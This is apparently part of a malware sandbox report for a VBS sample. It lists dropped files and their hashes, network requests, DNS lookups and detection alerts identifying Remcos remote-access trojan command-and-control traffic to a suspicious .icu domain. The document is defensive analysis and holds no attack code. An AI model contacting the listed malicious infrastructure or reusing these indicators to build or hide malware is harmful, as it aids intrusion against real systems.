3080msiexec.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:D951F3AF76E1044D806B9A755FDF560E
SHA256:2945147B2BFC6E88C9F05FE3A571649C560C5440C426D78116506896E71CEACC
4932msiexec.exeC:\Users\admin\AppData\Local\Temp\hkcsarchotext
MD5:73AFEF57A57FF8285682E59AEBA8FE4A
SHA256:9081F636845E9A6B7D781F2F35A28B33B7FDF5373075B435C5B373119D0934A3
6500powershell.exeC:\Users\admin\AppData\Roaming\Pestersome.Lintext
MD5:FEA26DD912A1B2FBE245FB61CF1A2A1E
SHA256:EED5FE194C635E8AD5871DCFEE9AEE934D2867A957D8CD047D73EA962A30AD89
6092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ix21eryi.xqc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
37
DNS requests
19
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4640
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4640
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1144
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
3080
msiexec.exe
GET
200
142.250.185.99:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
3080
msiexec.exe
GET
200
142.250.185.99:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
3080
msiexec.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
92.123.104.28:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
www.bing.com
  • 92.123.104.28
  • 92.123.104.26
  • 92.123.104.29
  • 92.123.104.30
  • 92.123.104.19
  • 92.123.104.20
  • 92.123.104.21
  • 92.123.104.25
  • 92.123.104.27
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 172.217.18.14
whitelisted
login.live.com
  • 20.190.159.75
  • 40.126.31.73
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.68
  • 20.190.159.64
  • 20.190.159.71
  • 40.126.31.71
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
of1x.icu
  • 188.114.96.3
  • 188.114.97.3
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
6500
powershell.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.icu) in TLS SNI
3080
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
3080
msiexec.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 25
3080
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
3080
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
3080
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Reqt 83291.vbs